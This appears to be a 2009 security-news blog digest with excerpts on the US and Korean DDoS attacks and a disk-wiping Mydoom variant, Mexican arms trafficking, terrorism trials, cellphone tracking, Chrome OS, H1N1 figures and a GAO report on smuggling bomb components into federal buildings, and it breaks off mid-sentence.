There are signs that the concerted cyber attacks targeting U.S. and Korean government and commercial Web sites this past week are beginning to wane. Yet, even if the assaults were to be completely blocked tomorrow, the attackers could still have one last, inglorious weapon in their arsenal: New evidence suggests that the malicious code responsible for spreading this attack includes instructions to overwrite the infected PC's hard drive.

According to Joe Stewart, director of malware research at SecureWorks, the malware that powers this attack -- a version of the Mydoom worm -- is designed to download a payload from a set of Web servers. Included in that payload is a Trojan horse program that overwrites the data on the hard drive with a message that reads "memory of the independence day," followed by as many "u" characters as it takes to write over every sector of every physical drive attached to the compromised system.

Stewart said he tested the self-destruct Trojan in his lab and found that it indeed erases the hard drive on the compromised system. For now, however, the Mydoom component isn't triggering that feature.

"One possibility is there's a bug in the code and it's supposed to run but it doesn't," Stewart said. "Or, there may be a time factor involved, where it's not supposed to erase the hard drive until a certain time."

Such an order would spell certain disaster for many tens of thousands of Microsoft Windows PCs. Several experts I spoke with yesterday and today estimated that between 60,000 and 100,000 systems may be infected with this potentially suicidal malware.

[...]

Meanwhile, the attacks that slowed washingtonpost.com and several other U.S.-based Web sites have since been focused almost exclusively on Korean Web sites. Alex Lanstein, senior security researcher at Fireeye, a Milpitas, Calif., based computer security firm, said the attackers dropped the U.S. government and commercial Web sites from their hit-list on Tuesday afternoon, after those sites began working with large Internet service providers to filter and block attack traffic.

Lanstein said the unknown attackers have since concentrated the attack on a handful of S. Korean government and commercial Web sites, such as egov.go.kr, Web portal daum.net, online auction house auction.go.kr, and Korean news site chosun.com.

[...]

Update, July 10, 10:00 a.m. ET: South Korean anti-virus firm Hauri has published an exhaustive analysis of this malicious software, available at this link here (PDF). It states that when July 10, AM 00:00 comes, the malicious code deletes files with certain extensions, that the "operating system not found" error appears at the next boot, and that the system cannot then be started normally.

Meanwhile, SecureWorks' Stewart said it looks like it is only the first megabyte of the hard drive that is overwritten. "Still with the [Windows Master Boot Record] and partition table gone, it is enough to make it unbootable and unrecoverable for the normal user with only a Windows CD in recovery mode," Stewart said. "It has subroutines to delete or encrypt files after that, so even more advanced recovery techniques are made more difficult."

Mexico: Economics and the Arms Trade

Via Stratfor (Global Security & Intellgience Report) -

On June 26, the small Mexican town of Apaseo el Alto, in Guanajuato state, was the scene of a deadly firefight between members of Los Zetas and federal and local security forces. The engagement began when a joint patrol of Mexican soldiers and police officers responded to a report of heavily armed men at a suspected drug safe house. When the patrol arrived, a 20-minute firefight erupted between the security forces and gunmen in the house as well as several suspects in two vehicles who threw fragmentation grenades as they tried to escape.

When the shooting ended, 12 gunmen lay dead, 12 had been taken into custody and several soldiers and police officers had been wounded. At least half of the detained suspects admitted to being members of Los Zetas, a highly trained Mexican cartel group known for its use of military weapons and tactics.

When authorities examined the safe house they discovered a mass grave that contained the remains of an undetermined number of people (perhaps 14 or 15) who are believed to have been executed and then burned beyond recognition by Los Zetas. The house also contained a large cache of weapons, including assault rifles and fragmentation grenades. Such military ordnance is frequently used by Los Zetas and the enforcers who work for their rival cartels.

STRATFOR has been closely following the cartel violence in Mexico for several years now, and the events that transpired in Apaseo el Alto are by no means unique. It is not uncommon for the Mexican authorities to engage in large firefights with cartel groups, encounter mass graves or recover large caches of arms. However, the recovery of the weapons in Apaseo el Alto does provide an opportunity to once again focus on the dynamics of Mexico’s arms trade.

--------------------------

The section above is just the main lead-in into yet another very informative article from Stratfor.

The full article linked above is recommended if you are interested in Mexico and arm trafficking in general.

Here is an interesting block that gives you a better understanding on some of those numbers we have heard about...

According to the report, some 30,000 firearms were seized from criminals by Mexican officials in 2008. Out of these 30,000 firearms, information pertaining to 7,200 of them, (24 percent) was submitted to the U.S. Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF) for tracing. Of these 7,200 guns, only about 4,000 could be traced by the ATF, and of these 4,000, some 3,480 (87 percent) were shown to have come from the United States.

This means that the 87 percent figure comes from the number of weapons submitted by the Mexican government to the ATF that could be successfully traced and not from the total number of weapons seized by the Mexicans or even from the total number of weapons submitted to the ATF for tracing. The 3,480 guns positively traced to the United States equals less than 12 percent of the total arms seized in 2008 and less than 48 percent of all those submitted by the Mexican government to the ATF for tracing.

In a response to the GAO report, the U.S. Department of Homeland Security (DHS) wrote a letter to the GAO (published as an appendix to the report) calling the GAO’s use of the 87 percent statistic “misleading.” The DHS further noted, “Numerous problems with the data collection and sample population render this assertion as unreliable.”

Alleged Iranian and Hezbollah Agents on Trial for Targeting Russian-Operated Radar Station in Azerbaijan

Via The Jamestown Foundation -

A trial of six people accused of terrorism and other serious crimes began on June 24 in Baku, Azerbaijan. Two Lebanese citizens, Karaki Ali Muhammad and Najmaddin Ali Hussein, were charged with treason, revealing secret information abroad, espionage, preparation of acts of terrorism, drug trafficking and arms smuggling. Four Azerbaijani citizens, Javid Mamadov, Vidadi Rasulov, Mushfig Amanov and Afgan Balashev all face similar charges. The alleged terrorist cell planned to bomb the Israeli Embassy in Baku as well as blow up the Russian-operated Qabala radar station. According to investigation records, the group was receiving orders from Iran’s Revolutionary Guards and Lebanon’s Hezbollah. Both Lebanese “had been trained and sent to Azerbaijan by terrorist organizations Hezbollah and al-Qaeda.” (Trend News [Baku], June 10). The suspects allegedly planned to attract local people to cooperate with them in carrying out terrorist attacks in densely populated areas. After getting their instructions from Hezbollah, the two Lebanese arrived in Iran, where agents of the Revolutionary Guards helped them to cross the border into Azerbaijan. Once there, they are alleged to have established a group consisting of local citizens, convincing them to bomb the Qabala radar station (Dayaz, May 27).

The investigation revealed that members of the group visited the Qabala region in August 2007 and took photos of the radar station. Meanwhile, group leader Karaki Ali Muhammad visited Baku several times since 2007 to collect information about Israel’s embassy. During the trial the leader of the ring admitted that he had represented Hezbollah in Iran since 2003 and his monthly wage from this organization was $900. He was ordered to collect information on the Jewish Cultural Center in Baku as well investigate a number of Iranians who “help Israel” (Turan Information Agency [Baku], June 19). Karaki Ali Muhammad was born in 1967 in the Lebanese city of Nabatia but lived for a long time in Tehran. Officially, Muhammad did not have a job while in Tehran, but he accompanied tourists to the holy places of Iran. He assembled tourist groups near Tehran’s al-Nabi Mosque and was hired there by an employee of the Iranian Ministry of Security and Intelligence (Vezarat-e Ettela’at va Anmiat-e Keshvar – VEVAK).

ASCAP Makes Outlandish Copyright Claims on Cell Phone Ringtones

Via EFF -

The Electronic Frontier Foundation (EFF) urged a federal court Wednesday to reject bogus copyright claims in a ringtone royalty battle that could raise costs for consumers, jeopardize consumer rights, and curtail new technological innovation.

Millions of Americans have bought musical ringtones, often clips from favorite popular songs, for their mobile phones. Mobile phone carriers pay royalties to song owners for the right to sell these snippets to their customers. But as part of a ploy to squeeze more money out of the mobile phone companies, the American Society of Composers, Authors, and Publishers (ASCAP) has told a federal court that each time a phone rings in a public place, the phone user has violated copyright law. Therefore, ASCAP argues, phone carriers must pay additional royalties or face legal liability for contributing to what they claim is cell phone users' copyright infringement. In an amicus brief filed Wednesday, EFF points out that copyright law does not reach public performances "without any purpose of direct or indirect commercial advantage" -- clearly the case with cell phone ringtones. If phone users are not infringing copyright law, then mobile phone service providers are not contributing to any infringement.

"This is an outlandish argument from ASCAP," said EFF Senior Intellectual Property Attorney Fred von Lohmann. "Are the millions of people who have bought ringtones breaking the law if they forget to silence their phones in a restaurant? Under this reasoning from ASCAP, it would be a copyright violation for you to play your car radio with the window down!"

ASCAP has responded by saying that it does not plan to charge mobile phone users, just mobile phone service providers. But if ASCAP prevails, consumers could find themselves targeted by other copyright owners for "public performances." Worse, these wrongheaded legal claims cast a shadow over innovators who are building gadgets that help consumers get the most from their copyright privileges.

"Because it is legal for consumers to play music in public, it's also legal for my mobile phone carrier to sell me a ringtone and a phone to do it," said von Lohmann. "Otherwise it would be illegal to sell all kinds of technologies that help us enjoy our fair use, first sale, and other copyright privileges."

The Center for Democracy and Technology and Public Knowledge also joined the EFF brief.

For the full amicus brief:
http://www.eff.org/files/filenode/US_v_ASCAP/US%20v%20ASCAP%20EFF%20ATT%...

For more on this case:
http://www.eff.org/cases/us-v-ascap

Contact:

Rebecca Jeschke
Media Relations Director
Electronic Frontier Foundation
press@eff.org

Merriam Webster: New Words for 2009

http://www.merriam-webster.com/info/newwords09.htm

Hardworking word-lovers everywhere can now learn the meaning of the word staycation ("a vacation spent at home or nearby") along with nearly 100 other new words and senses added to Merriam-Webster's Collegiate Dictionary, Eleventh Edition. America's best-selling dictionary offers its new 2009 entries in its updated print edition and online here at Merriam-Webster.com.

Many of the new words address: concerns about the environment (carbon footprint, green collar), government activities (earmark, waterboarding), health and medicine (cardioprotective, locavore, naproxen, neuroprotective), pop culture (docusoap, fan fiction, flash mob, reggaeton), online activities (sock puppet, vlog, webisode), as well as several miscellaneous terms such as haram, memory foam, missalette, and zip line.

Saudi Arabia Convicts 300 Al-Qaida Suspects

Via Yahoo! News (AP) -

A Saudi criminal court has convicted and sentenced an al-Qaida militant to death and given more than 300 others jail terms, fines and travel bans in the country's first known terrorism trials for suspected members of the terror network, officials said Wednesday.

A Justice Ministry spokesman said the court looked into 179 cases involving the 330 defendants who were found guilty. The spokesman did not give any details on the person sentenced to death, but his punishment suggests he could be a senior member of al-Qaida.

Saudi Arabia has pursued an aggressive campaign against militants since May 2003, when they first began attacks in the kingdom, which is al-Qaida leader Osama bin Laden's birthplace and home to 15 of the 19 Sept. 11 hijackers.

The network's attacks have targeted expatriate residential compounds, oil installations and government buildings.

However, the first known legal proceedings, which have been held in utmost secrecy, apparently did not start until last year. Authorities had been reluctant to resort to trials for terrorism charges that could result in death sentences until they had shown the public that every effort had been made to give the men a chance to renounce their crimes and be rehabilitated.

The 330 are believed to be among the 991 suspected militants that Interior Minister Prince Nayef has said had been charged with participating in terrorist attacks over the past five years.

Sheik Abdullah al-Saadan, the Justice Ministry spokesman, told Saudi TV the court has acquitted "some" defendants. He did not say how many nor did he say when the trials began. There have been vague reports of such trials in local media recently.

"The verdicts ranged from ... jail terms that depend on the nature of the crime and death in one of the cases," al-Saadan said.

He said the rulings also included financial penalties, travel bans and house arrests in the city of the defendants' choice, added al-Saadan. A transcript of his remarks were carried by the official Saudi Press Agency.

Al-Saadan said the verdicts can be appealed. He also said preparations are under way to give access to the press to cover the trials, apparently referring to those of the remaining detainees.

A statement issued by a spokesman for the Bureau of Investigation and General Prosecution said the defendants were accused of belonging to the "deviant group," a euphemism for al-Qaida.

They were also accused of supporting and financing terrorism, going to areas of conflict to fight, and coordinating and communicating with "external parties that seek to conspire against national security by creating chaos and disrupting security," according to the unnamed spokesman.

The statement, also carried by official press agency, said the charge sheets included "incriminating evidence of these dangerous acts and proof that every defendant has carried out the charges against him."

There have been no major attacks since February 2006, when suicide bombers tried but failed to attack an oil facility at the Abqaiq oil complex, the world's largest oil processing facility, in eastern Saudi Arabia.

Milw0rm is Back Up and Running - For a While

http://www.milw0rm.com/

st0ke said the following on twitter just 5 mins ago...

milw0rm's back up & posting will start once again, I can't let all of the emails in my submit box to just sit there.

How long it will be up is unknown...and while I have seen some chatter about possible groups taking it over (and running it as it is)...no solid news has been made at this point.

Growing Presence in the Courtroom: Cellphone Data as Witness

Via NYTimes -

The pivotal role that cellphone records played in these two prominent New York murder trials this year highlights the surge in law enforcement’s use of increasingly sophisticated cellular tracking techniques to keep tabs on suspects before they are arrested and build criminal cases against them by mapping their past movements.

But cellphone tracking is raising concerns about civil liberties in a debate that pits public safety against privacy rights. Existing laws do not provide clear or uniform guidelines: Federal wiretap laws, outpaced by technological advances, do not explicitly cover the use of cellphone data to pinpoint a person’s location, and local court rulings vary widely across the country.

In one case that unsettled cellphone companies, a sheriff in Alabama told a carrier he needed to track a cellphone in an emergency involving a child — she turned out to be his teenage daughter, who was late returning from a date.

For more than a decade, investigators have been able to match an antenna tower with a cellphone signal to track a phone’s location to within a radius of about 200 yards in urban areas and up to 20 miles in rural areas. Now many more cellphones are equipped with global-positioning technology that makes it possible to pinpoint a user’s position with much greater precision, down to a few dozen yards.

To determine where a suspect’s phone was in the past — as in the Mallayev and Littlejohn cases — investigators use company records that show a phone’s approximate location at the beginning and end of a call.

To track suspects in real time, law enforcement officials must ask a phone company to “ping,” or send a signal to, a phone; for the effort to succeed, the phone must be turned on, though it does not have to be in use. The police can then use a vehicle with signal-tracking equipment to narrow down the location.

The frequency and ease with which law enforcement agencies access cellphone data to track people is difficult to assess. Civil liberties groups recently obtained data from the Justice Department through a lawsuit showing that in some jurisdictions, including New Jersey and Florida, courts often allow federal prosecutors to track the location of cellphone users in real time without search warrants.

Investigators seeking warrants must provide a judge with probable cause that a crime has been committed. But investigators often obtain cell-tracking records under lower standards of judicial review — through subpoenas, which are granted routinely, or through an intermediate type of court order based on an argument that the information requested would be relevant to an investigation.

In what would be the highest-level court decision on the issue so far, a federal appeals court in Pennsylvania is expected to rule this summer on whether search warrants are required for the most basic cellphone tracking data — the electronic footprints that cellphone users leave behind in company records, often without realizing it.

In March, Google announced that it would require search warrants before releasing GPS data that pinpoints the movements of customers who use its mapping applications — like Latitude, which lets people see where their friends are — on their phones.

But phone and Internet companies want Congress to clarify the laws so that they are clear about their legal responsibilities.

Civil libertarians do not oppose using cellphone surveillance to solve crimes or save people in emergencies, but they worry that the legal gray area is enabling it to happen without much scrutiny or discussion.

“The cost of carrying a cellphone should not include the loss of one’s personal privacy,” said Catherine Crump, a lawyer for the American Civil Liberties Union, which filed a lawsuit along with the Electronic Frontier Foundation after the Justice Department did not respond to a Freedom of Information request for data. Federal and local law enforcement officials argue that people who obey the law have nothing to fear from cellphone tracking.

Firefox Stability to Get a Boost with Multiprocess Browsing

Via arstechnica.com -

Mozilla has launched a new project called Electrolysis that aims to bring multiprocess browsing to Firefox. According to Mozilla, splitting up the page rendering workload into multiple processes will improve the browser's performance, security, and stability. The developers have already assembled a prototype that renders a page in a separate process from the interface shell in which it is displayed.

Mozilla has explored the possibility of adopting a multiprocessing approach for Firefox in the past, but the idea didn't gain serious traction in the Firefox developer community until it was implemented by Google and Microsoft in their respective web browsers. Google's Chrome browser uses a separate process for each page, an architectural approach that facilitates much more effective security sandboxing and prevents page-specific rendering glitches from crashing the entire browser. Chrome even includes a process manager tool that can be used to see the status and resource consumption of each page.

[...]

Jones says that his prototype represents the work that the Electrolysis developers have done to meet the requirements specified by "phase I" of Mozilla's multiprocess roadmap. To bootstrap the development of the IPC system, Mozilla is using some code from Chromium, the open source development version of Google's browser. The developers are contemplating the possibility of replacing existing Firefox components, such as the browser's network stack, with additional code from Chromium.

The experimental development work that is being done by various contributors on the Electrolysis project was recently consolidated into a single version control repository. The developers hope to have nightly builds ready for developer testing soon, but they caution that it will not yet work on Mac OS X. They are looking for volunteer Mac developers to participate in the project.

Electrolysis is going to be a truly enormous project. It's not clear yet if it will be ready in time for the next release of Firefox, which is codenamed Namaroka. The work on Electrolysis will be done parallel to Namaroka development, so it will not impede other plans to improve the browser. The early Electrolysis prototype and other parts that have been implemented so far are highly impressive. The project is off to a very promising start and has the potential to bring a lot of value to the Firefox browser and its users.

Milw0rm Closes Up Shop

http://209.85.229.132/search?q=cache:UB9G4tPVbxoJ:www.milw0rm.com/+milw0rm.com&cd=1&hl=es&ct=clnk&gl=es

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke

--------------------------

Clearly this is a sad day, but I hope stroke the best...and thank him for all the great information thru the years. Milw0rm will be sorely missed.

Dino Dai Zovi on Mac OS X Rootkits, Mac Exploitation & Hacking Contests

Via Threatpost (Digital Underground Podcast) -

Dennis Fisher talks with security researcher Dino Dai Zovi about his upcoming Black Hat talk on Mac OS X rootkits, exploiting the Mac and the value of hacking contests and internal code reviews.

http://www.threatpost.com/sites/default/files/digital_underground_23.mp3

GAO Smuggles IED Materials in Federal Buildings, Citing Security Gaps

Via FoxNews -

Government investigators smuggled bomb-making materials into federal buildings past the police agency charged with protecting those buildings and found numerous other gaps in security, according to a congressional report.

The Government Accountability Office said investigators carried bomb-making materials past security at 10 federal buildings. Security at these buildings and a total of about 9,000 federal buildings around the country is provided by the Federal Protective Service, a target of the probe.

Once GAO investigators got the materials in the buildings, the report said, they constructed explosive devices and carried them around inside. For security reasons, the GAO report did not give the location of the buildings.

The report was made available to The Associated Press in advance of a hearing scheduled Wednesday of the Senate Homeland Security and Governmental Affairs Committee.

--------------------------------

GAO-09-859T - Preliminary Results Show Federal Protective Service's Ability to Protect Federal Facilities Is Hampered By Weaknesses in Its Contract Security Guard Program (PDF)

Here are some of the juicy highlights which I found interesting....

• A guard was caught using government computers, while he was supposed to be standing post, to further his private for-profit adult website.
  
• A guard failed to recognize or did not properly x-ray a box containing semi-automatic handguns at the loading dock at one federal facility we visited. FPS only became aware of the situation because the handguns were delivered to FPS.

But the details of the covert IED testing show the real threat...

We identified substantial security vulnerabilities related to FPS’s guard program. Each time they tried, in April and May 2009, our investigators successfully passed undetected through security checkpoints monitored by FPS’s guards, with the components for an IED concealed on their persons at 10 level IV facilities in four cities in major metropolitan areas.

The specific components for this device, items used to conceal the device components, and the methods of concealment that we used during our covert testing are classified, and thus are not discussed in this testimony. Of the 10 level IV facilities we penetrated, 8 were government owned and 2 were leased facilities. The facilities included field offices of a U.S Senator and U.S. Representative as well as agencies of the Departments of Homeland Security, Transportation, Health and Human Services, Justice, State and others. The two leased facilities did not have any guards at the access control point at the time of our testing.

Introducing the Google Chrome OS

Via the Official Google Blog -

It's been an exciting nine months since we launched the Google Chrome browser. Already, over 30 million people use it regularly. We designed Google Chrome for people who live on the web — searching for information, checking email, catching up on the news, shopping or just staying in touch with friends. However, the operating systems that browsers run on were designed in an era where there was no web. So today, we're announcing a new project that's a natural extension of Google Chrome — the Google Chrome Operating System. It's our attempt to re-think what operating systems should be.

Google Chrome OS is an open source, lightweight operating system that will initially be targeted at netbooks. Later this year we will open-source its code, and netbooks running Google Chrome OS will be available for consumers in the second half of 2010. Because we're already talking to partners about the project, and we'll soon be working with the open source community, we wanted to share our vision now so everyone understands what we are trying to achieve.

Speed, simplicity and security are the key aspects of Google Chrome OS. We're designing the OS to be fast and lightweight, to start up and get you onto the web in a few seconds. The user interface is minimal to stay out of your way, and most of the user experience takes place on the web. And as we did for the Google Chrome browser, we are going back to the basics and completely redesigning the underlying security architecture of the OS so that users don't have to deal with viruses, malware and security updates. It should just work.

Google Chrome OS will run on both x86 as well as ARM chips and we are working with multiple OEMs to bring a number of netbooks to market next year. The software architecture is simple — Google Chrome running within a new windowing system on top of a Linux kernel. For application developers, the web is the platform. All web-based applications will automatically work and new applications can be written using your favorite web technologies. And of course, these apps will run not only on Google Chrome OS, but on any standards-based browser on Windows, Mac and Linux thereby giving developers the largest user base of any platform.

[...]

We have a lot of work to do, and we're definitely going to need a lot of help from the open source community to accomplish this vision. We're excited for what's to come and we hope you are too. Stay tuned for more updates in the fall and have a great summer.

US & German Intel: Al Qaeda Plots Multiple Attacks on US & Israel-bound Airliners

Via Debka.com -

Western anti-terror agencies have warned that a large group of 15-20 al Qaeda terrorists, trained in Pakistan and Algeria to hijack and blow up airliners, deployed secretly in at least six European and Middle East countries in early July. They are standing ready to carry out multiple terrorist attacks.

The terrorists are believed to have landed in Britain, Germany, France, Italy, Turkey and Egypt.

The dates to watch, local authorities were warned, were July 4, July 7, the fourth anniversary of the 7/7 attacks on the British transport system in which 52 people died, and July 8-9, when the G8 summit meets in the Italian town of L'Aqila. US president Barack Obama will fly in from talks with Russian leaders in Moscow.

Al Qaeda planners, say the Western sources, know it is extremely hard to break through the massive security cordons protecting summit leaders. They are therefore planning to hijack passenger planes of airlines belonging to the targeted states and blow them up in mid-air.

DEBKAfile's counter-terror sources report the first specific red alert on Saturday, July 4, referred to the possible hijack of Turkish Airways planes taking of from Turkish airports for US destinations or Tel Aviv. Special precautionary measures were put in place at both ends of their routes.

The alert is still in force.

Taliban Launches Operation ‘Iron Net’ Against US Marines in Afghanistan

Via Daily Times (Pakistan) -

The Taliban said on Monday they have launched a guerrilla operation to thwart a major assault by the newly-deployed US Marines on their Helmand strongholds.

Operation Foladi Jal would teach the Marines “a lesson”. Taliban spokesman Yousuf Ahmadi told AFP by telephone from an unknown location.

About 4,000 Marines poured into the southern province on Thursday in an operation called Khanjar (dagger) to tackle the Taliban in the region.

“In response to Operation Khanjar by the invading forces, we have launched the operation,” Ahmadi said. The operation would include improvised bomb explosions and “hit-and-run guerrilla attacks”, Ahmadi said.

“We will not engage them in front battles. We would rather hit them by mines and guerrilla attacks,” he said

Interior Ministry Officials in Pakistan Arrested‏ for Weapons Scam

Via Dawn.com (Pakistan) -

ISLAMABAD: Three officers from the interior ministry were arrested on Tuesday for illegally issuing weapons licenses, DawnNews reports.

The officials have been charged with issuing 161 weapons licenses despite a legal ban on the sale of arms.

Interior Ministry Secretary Syed Kamal Shah told a Senate sub-committee that these three officers pocketed Rs7.5 million by issuing the licenses illegally.

Meanwhile, a top security official also told the committee that they have intelligence a terrorist may strike Islamabad in the next forty eight hours.

Federal Websites Knocked Out by DDoS Attack

Via Google (AP) -

A widespread and unusually resilient computer attack that began July 4 knocked out the Web sites of several government agencies, including some that are responsible for fighting cyber crime, The Associated Press has learned.

The Treasury Department, Secret Service, Federal Trade Commission and Transportation Department Web sites were all down at varying points over the holiday weekend and into this week, according to officials inside and outside the government. Some of the sites were still experiencing problems Tuesday evening. Cyber attacks on South Korea government and private sites also may be linked, officials there said.

U.S. officials refused to publicly discuss details of the cyber attack. But Amy Kudwa, spokeswoman for the Homeland Security Department, said the agency's U.S. Computer Emergency Readiness Team issued a notice to federal departments and other partner organizations about the problems and "advised them of steps to take to help mitigate against such attacks."

The U.S., she said, sees attacks on its networks every day, and measures have been put in place to minimize the impact on federal Web sites.

It was not clear whether other federal government sites also were attacked.

Others familiar with the U.S. outage, which is called a denial of service attack, said that the fact that the government Web sites were still being affected three days after it began signaled an unusually lengthy and sophisticated attack. The officials spoke on condition of anonymity because they were not authorized to speak on the matter.

Web sites of major South Korean government agencies, banks and Internet sites also were paralyzed in a suspected cyber attack Tuesday. Ahn Jeong-eun, a spokeswoman at the Korea Information Security Agency, said the U.S. and South Korean attacks appeared to be linked.

The South Korean sites included the presidential Blue House, the Defense Ministry, the National Assembly, Shinhan Bank, Korea Exchange Bank and top Internet portal Naver. They went down or had access problems since late Tuesday, Ahn said.

Kudwa had no comment on the South Korean attacks.

Two government officials acknowledged that the Treasury and Secret Service sites were brought down, and said the agencies were working with their Internet service provider to resolve the problem.

Ben Rushlo, director of Internet technologies at Keynote Systems, called it a "massive outage" and said problems with the Transportation Department site began Saturday and continued until Monday, while the FTC site was down Sunday and Monday.

Keynote Systems is a mobile and Web site monitoring company based in San Mateo, Calif. The company publishes data detailing outages on Web sites, including 40 government sites it watches.

According to Rushlo, the Transportation Web site was "100 percent down" for two days, so that no Internet users could get through to it. The FTC site, meanwhile, started to come back online late Sunday, but even on Tuesday Internet users still were unable to get to the site 70 percent of the time.

"This is very strange. You don't see this," he said. "Having something 100 percent down for a 24-hour-plus period is a pretty significant event."

He added that, "The fact that it lasted for so long and that it was so significant in its ability to bring the site down says something about the site's ability to fend off (an attack) or about the severity of the attack."

Novel H1N1 Flu Situation Update

http://www.cdc.gov/h1n1flu/update.htm
Data reported to CDC by July 2, 2009, 11:00 AM ET.

33,902 confirmed and probable cases with 170 deaths in 53 US states / territories (including the District of Columbia, Puerto Rico and the U.S. Virgin Islands)

NOTE: Because of daily reporting deadlines, the state totals reported by CDC may not always be consistent with those reported by state health departments. If there is a discrepancy between these two counts, data from the state health departments should be used as the most accurate number.

---------------------------------

WHO Pandemic (H1N1) 2009 - update 58
6 July 2009 09:00 GMT

The breakdown of the number of laboratory-confirmed cases is given in this map.

Cumulative number of global laboratory-confirmed cases = 94,512 (440 deaths)

Check out the July 7th virtual press briefing with Dr Keiji Fukuda, Assistant Director-General ai, Health Security and Environment [mp3 16Mb]

WHO has a very cool interface map as well...which requires Flash. The numbers are a little behind, but it gives a very cool overall.

----------------------------------

It is important to remember that the US CDC number includes both lab-confirmed cases and probable cases...the WHO only counts lab-confirmed cases.

Facebook's Own Estimates Show Declining Student Numbers

Via readwriteweb.com -

How fickle are kids these days? Just when all the grown ups started figuring out Facebook, college and high school users have declined in absolute number by 20% and 15% respectively in a mere six months, according to estimates Facebook provides to advertisers that were archived for tracking by an outside firm. Facebook users aged 55 and over have skyrocketed from under 1 million to nearly six million in the same time period. There are more Facebook users over 55 years old today than there are high school students using the site.

Grandma and Grandpa showed up to have a conversation, but Billy and Sally were gone. Facebook cannot be excited about this.

The dramatic change in user demographics was picked up by iStrategyLabs today. Anyone can go through Facebook's self-serve advertising program and see the user demographics numbers the company estimates now, iStrategyLabs captured that data six months ago and saved it for comparison. The changes have been dramatic.

According to this data, from Facebook's own ad platform, there are actually fewer high school and college users on Facebook today than there were six months ago.

Hizb ut-Tahrir Plotting Against the Pakistan Government

Via Times Online UK -

Followers of the fundamentalist group Hizb ut-Tahrir (HT) have called for a “bloodless military coup” in Islamabad and the creation of the caliphate in which strict Islamic laws would be rigorously enforced.

Members of the group, which describes itself as the Liberation party in Britain but is banned in Pakistan, revealed last week that it had targeted the country as a base from which to spread Islamic rule across the world.

The Sunday Times has obtained the names of a dozen British Hizb ut-Tahrir activists based in Lahore and Karachi, or commuting between Britain and Pakistan. There are believed to be many more.

Tayyib Muqeem, an English teacher from Stoke-on-Trent, said he had moved to Lahore to convert Pakistanis to the movement.

At Lahore’s Superior College, where Muqeem has set up a Hizb ut-Tahrir student group, he said the organisation’s aim was to subject Muslim and western countries to Islamic rule under sharia law, “by force” if necessary.

In a caliphate, “every woman would have to cover up” and stoning to death for adultery and the chopping off of thieves’ hands would be the law, he said.

He added that Islamic rule would be spread through “indoctrination” and by “military means” if non-Muslim countries refused to bow to it. “Waging war” would be part of the caliphate’s foreign policy.

One of Hizb ut-Tahrir’s strategies in Pakistan is to influence military officers, he revealed.

Shahzad Sheikh, a Pakistani recruit and the group’s official spokesman in Karachi, talked openly about persuading the army to instigate a “bloodless coup” against the present government who, he said, were “worse than the Taliban”.

“It is the military who hold the power (in Pakistan) and we are asking them to give their allegiance to Hizb ut-Tahrir,” he said. “I can’t explain to you in detail how we are trying to influence the military . . . We never disclose our methodology of change. You may say it’s a coup.”

-------------------

Hizb ut-Tahrir (Arabic: حِزْبُ التَحْرِير‎; English: Party of Liberation) is an international pan-Islamist, Sunni, vanguard political party whose goal is to combine all Muslim countries in a unitary Islamic state or caliphate, ruled by Islamic law and with a caliph head of state elected by Muslims.

HT is not designated as a terrorist organization in the United States, however many consider it to be a stepping stone to more militant organizations.

GlobalSecurity.org - Hizb ut-Tahrir al-Islami

Jamestown - Hizb-ut-Tahrir's Activities in the United States

CT Blog - Hizb ut-Tahrir America (HTA) Enters Public Stage

Official Hizb ut-Tahrir website (English)

Synthetic-aperture Radar Might Perform Double Duty as High-Speed Data Links

Via DefenseSystems.com -

Synthetic aperture radars have used radio frequency technology to give aircraft, ships and ground troops highly detailed tracking data. Now, they might provide a way to share that data in real time. Contractors Raytheon and L-3 Communications have combined efforts in a joint development program that might turn synthetic aperture radar systems into nodes on a high-speed, mobile ad hoc network.

Using the radar’s antennas simultaneously for radar sensing and as a high-speed data link, fighter aircraft would be able to transmit full sensor data — previously only available within the aircraft — to other aircraft and ground stations more than 100 miles away. If successful, the capability that Raytheon and L-3 are developing might transform fighter aircraft and other vehicles equipped with Active Electronically Scanned Array (AESA) radars into powerful intelligence, surveillance and reconnaissance (ISR) platforms, sending synthetic aperture radar images at speeds as fast as 4 gigabits/sec.

“The data that [fighter aircraft have] gathered, which is extremely valuable, has been limited to use in that cockpit because there was no way to offload that amount of data,” said Lucas Bragg, Raytheon’s senior manager of advanced programs. “By now enabling their radar to act as a communications device, you're now able to offload this highly va